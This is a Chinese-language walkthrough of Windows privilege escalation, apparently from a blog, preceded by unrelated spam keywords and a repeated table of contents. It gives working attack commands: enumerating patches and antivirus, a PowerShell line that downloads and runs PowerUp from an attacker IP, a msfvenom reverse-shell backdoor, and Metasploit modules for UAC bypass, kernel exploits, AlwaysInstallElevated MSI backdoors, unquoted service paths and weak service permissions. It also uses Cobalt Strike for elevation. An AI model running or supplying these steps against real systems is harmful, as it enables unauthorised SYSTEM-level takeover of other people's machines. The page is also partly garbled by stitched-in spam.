wordpress模块,网站免费优化平台,杭州网站建设公司费用,成全视频免费观看在线看小说原著叫什么目录
手动收集
工具收集
windows本地内核提权
本地提权
根据windows去找需要的exp进行利用 提权后结合mimikatz使用
msf提权
简单提权
生成后门
上线
BypassUAC绕过UAC提权
msf带的bypassuac模块可以尝试提权
Bypassuac提权命令操作 提权成功
local_exploi…
目录
手动收集
工具收集
windows本地内核提权
本地提权
根据windows去找需要的exp进行利用 提权后结合mimikatz使用
msf提权
简单提权
生成后门
上线
BypassUAC绕过UAC提权
msf带的bypassuac模块可以尝试提权
Bypassuac提权命令操作 提权成功
local_exploit_suggester后渗透检测本地漏洞模块
出现绿色的都是可能可以被利用的本地漏洞
使用一个绿色的模块成功提权
windows系统服务漏洞
msi提权嵌套后门
判断是否启用此策略设置
以管理员身份手动添加策略营造漏洞 msi打包安装包工具下载地址 打包过程详解
运行安装包上线后门 成功上线提权成功
拓展msf的自动打包好直接利用的模块
always_install_elevated模块
命令代码
提权成功 可信任服务路径提权
msf的集成的unquoted_service_path集成模块
成功提权
不安全的服务权限
service_permissions模块
提权成功
cs提权
先cs上线
提权模块
类比msf 然后再带*用户进行svc-exe的getsystem提权 提权成功
获取更多提权脚本
下载地址
上传到cs里
成功添加模块 手动收集
获取补丁信息
wmic qfe get Caption,Description,HotFixID,InstalledOn
获取杀软信息
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
获取杀软名和安装目录
WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe
工具收集
两个bat和一个powershell powershell的执行命令
powershell -ep bypass #进入powershell环境
Import-Module .\PowerUp.ps1 #导入powershell
Invoke-allchecks #执行功能
远程加载
powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(http://192.168.20.128:8000/PowerUp.ps1); Invoke-AllChecks
windows本地内核提权
本地提权
根据windows去找需要的exp进行利用
GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合https://github.com/SecWiki/windows-kernel-exploits?tabreadme-ov-file
随便找个对应工具进行的演示 提权后结合mimikatz使用 msf提权
简单提权
生成后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost192.168.20.128 lport8888 -f exe -o 8888.exe上线
getsystem提权失败的不是以管理员身份运行的后门
getsystem提权成功的是以管理员身份运行的后门 提权原理实际是命名管道原理进行模拟令牌进行提权如果我们dorp_token那么就会回到普通用户 BypassUAC绕过UAC提权
UAC:用户帐户控制(User Accountcontrol)是windows操作系统中采用的一种控制机制它以预见的方式阻止不必要的系统范围更改 getsystem提权方式对于普通用户来说是失败的不可正常执行的那么这种情况下就需要绕过系统UAC来进行getsystem提权
msf带的bypassuac模块可以尝试提权 Bypassuac提权命令操作
search bypassuac
use exploit/windows/local/bypassuac
set session 1
show targets
set target 1
run 提权成功
local_exploit_suggester后渗透检测本地漏洞模块
local_exploit_suggester是一个漏洞利用后渗透模块可用于检査系统中是否存在本地漏洞。它执行本地漏洞利用检查;但不会运行利用任何漏洞这意味着可以在不进行入侵的情况下扫描系统。不必手动搜索有效的本地漏洞;它将根据系统的平台和体系结构向您显示目标容易受到哪些攻击。 优点:省去手动查找本地漏洞的麻烦节省时间
缺点:不是所有列出的local exploit都可用
search local_exploit_suggester
use post/multi/recon/local_exploit_suggester
options
set session 1
run
出现绿色的都是可能可以被利用的本地漏洞 使用一个绿色的模块成功提权
use exploit/windows/local/ms15_051_client_copy_image
set target 1
set session 1
set payload windows/x64/meterpreter/reverse_tcp
run windows系统服务漏洞
msi提权嵌套后门
参考文章
AlwaysInstallElevated - Win32 apps | Microsoft Learnhttps://learn.microsoft.com/zh-cn/windows/win32/msi/alwaysinstallelevated
任意用户以NT AUTHORITY\SYSTEM权限安装MSI安装包。
MSI:Microsoft silent Installer是微软的安装包格式它在后台运行.exe安装程序AlwaysInstallElevated是一个策略设置当在系统中使用WindowsInstaller安装任何程序时该参数允许非特权用户以system权限运行MSI文件。如果目标系统上启用了这一设置我们可以使用msf生成msi文件来以system权限执行任意payload。
判断是否启用此策略设置
reg query HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
报错则说明未启用不能进行漏洞的利用提权 以管理员身份手动添加策略营造漏洞
reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1msi打包安装包工具下载地址
Free Download - MSI Wrapper Convert EXE to MSI free (exemsi.com)https://www.exemsi.com/download/ 打包过程详解
MSI打包后门成安装包-CSDN博客打包程序安装到自己电脑上。https://blog.csdn.net/weixin_74171325/article/details/140320559?csdn_share_tail%7B%22type%22%3A%22blog%22%2C%22rType%22%3A%22article%22%2C%22rId%22%3A%22140320559%22%2C%22source%22%3A%22weixin_74171325%22%7D
生成安装包完成 运行安装包上线后门
msiexec /quiet /qn /i C:\Users\admin\Desktop\8888.msi 成功上线提权成功 拓展msf的自动打包好直接利用的模块
always_install_elevated模块
命令代码
use exploit/windows/local/always_install_elevated
set sessions 1
set payload windows/x64/meterpreter/reverse_tcp
run
提权成功 可信任服务路径提权
原理存在缺陷的服务程序利用属于可执行文件的文件/文件夹权限Windows服务通常都是以System权限运行的所以系统在解析服务的二进制文件对应的文件路径中的空格的时候也会以系统权限进行解析。如果我们能利用这一特性就有机会进行权限提升。
C:\Program Files (x86)\Windows Folder\Common Folder\Folder.exe
C:\Program.exe
C:\Program Files (x86)\Windows.exe
C:\Program Files (x86)\Windows Folder\Common.exe
C:\Program Files (x86)\Windows Folder\Common Folder\Folder.exe
对于上面文件路径中的每一个空格windows都会尝试寻找并执行名字与空格前的名字相匹配的程序操作系统会对文件路径中空格的所有可能进行尝试直到找到一个匹配的程序。以上面的例子为例windows会依次尝试确定和执行下面的程序
检查目标主机是否可能存在漏洞
wmic service get name,displayname,pathname,startmode|findstr /i Auto |findstr /i /v C:\Windows\\ |findstr/i /v 检测对有漏洞的目录是否有写权限比如
icacls C:\Program Files (x86)\Windows FolderF 完全控制
CI 容器继承 - 此标志指示从属容器将继承此ACE。
OI Object Inherit - 这个标志表示从属文件将继承ACE。 msf的集成的unquoted_service_path集成模块
use exploit/windows/local/unquoted_service_path
set session 1
set payload windows/x64/meterpreter/reverse_tcp
run
成功提权 不安全的服务权限
service_permissions模块
use exploit/windows/local/service_permissions
set sessions 1
set payload windows/x64/meterpreter/reverse_tcp
run
提权成功 cs提权
先cs上线 提权模块 类比msf 然后再带*用户进行svc-exe的getsystem提权 提权成功 获取更多提权脚本
下载地址
GitHub - rsmudge/ElevateKit: The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strikes Beacon payload.https://github.com/rsmudge/ElevateKit 上传到cs里 成功添加模块
